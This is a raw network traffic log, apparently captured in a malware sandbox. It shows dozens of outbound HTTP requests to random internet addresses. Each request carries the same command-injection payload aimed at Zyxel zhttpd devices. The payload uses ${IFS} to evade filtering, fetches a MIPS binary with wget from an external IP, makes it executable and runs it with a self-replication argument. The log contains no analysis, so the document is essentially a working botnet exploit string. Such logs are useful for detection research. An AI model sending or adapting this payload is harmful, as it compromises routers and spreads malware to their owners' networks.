                                            Feb 2, 2024 06:21:21.798844099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6540192.168.2.15396844.187.184.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.798902035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6541192.168.2.1549206173.105.44.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.798918009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6542192.168.2.153958266.60.155.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.798980951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6543192.168.2.1552176195.198.24.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799026966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6544192.168.2.1549098139.35.83.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799066067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6545192.168.2.155181486.117.23.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799098969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6546192.168.2.1545340189.107.13.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799127102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6547192.168.2.154525414.110.170.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799168110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6548192.168.2.1558116137.189.197.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799194098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6549192.168.2.1559770123.153.208.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799246073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6550192.168.2.1537890171.202.53.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799282074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6551192.168.2.1535942116.167.248.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799335003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6552192.168.2.1544944208.226.249.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799362898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6553192.168.2.1556162105.129.117.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799403906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6554192.168.2.1538028192.53.2.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799421072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6555192.168.2.1546436178.43.17.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799474955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6556192.168.2.153448831.206.234.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799514055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6557192.168.2.1557550101.39.3.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799530029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6558192.168.2.153635231.18.87.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799580097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6559192.168.2.1559000223.104.217.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799616098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6560192.168.2.1536564120.51.250.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799642086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6561192.168.2.154962672.16.225.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799699068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6562192.168.2.1534072219.183.31.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799726963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6563192.168.2.1560550173.236.71.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799751997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6564192.168.2.1542072140.0.167.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799801111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6565192.168.2.1544834149.97.216.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799837112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6566192.168.2.1557178188.239.137.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799886942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6567192.168.2.155319647.211.52.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799920082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6568192.168.2.1537628114.12.193.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799949884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6569192.168.2.1538876223.1.66.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.799984932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6570192.168.2.154916027.218.37.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800009012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6571192.168.2.153535686.9.28.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800055027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6572192.168.2.153641048.86.130.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800080061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6573192.168.2.1547030132.220.233.218443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800112009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6574192.168.2.153960496.191.210.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800149918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6575192.168.2.1534290217.56.98.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800177097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6576192.168.2.1559168140.57.79.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800224066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6577192.168.2.1555250219.194.157.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800250053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6578192.168.2.153940884.131.80.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800287008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6579192.168.2.155511854.191.205.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800323009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6580192.168.2.155823498.93.30.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800388098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6581192.168.2.154877242.4.188.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800416946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6582192.168.2.153991673.41.120.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800451040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6583192.168.2.154838637.125.80.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800494909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6584192.168.2.153320291.204.68.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800534010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6585192.168.2.1550170206.25.170.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800574064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6586192.168.2.1559188157.42.204.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800628901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6587192.168.2.155010085.220.209.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800647974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6588192.168.2.1548168218.190.181.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800681114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6589192.168.2.153502482.20.238.21443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800729036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6590192.168.2.1558848158.102.156.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800765991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6591192.168.2.154173695.130.34.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800793886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6592192.168.2.1548096155.158.82.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800826073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6593192.168.2.1543058175.131.32.221443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800844908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6594192.168.2.1535862185.69.128.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800899982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6595192.168.2.1553256135.187.49.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800928116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6596192.168.2.1545752221.78.3.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800977945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6597192.168.2.1533740185.208.204.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.800998926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6598192.168.2.1539686194.212.99.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.801045895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6599192.168.2.1540532101.124.171.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.801090956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6600192.168.2.154051658.231.230.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.801114082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6601192.168.2.1539808152.190.101.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.801156998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6602192.168.2.153688479.255.27.163443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.801177979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6603192.168.2.1536768165.118.85.84443
                                            TimestampBytes transferredDirectionData
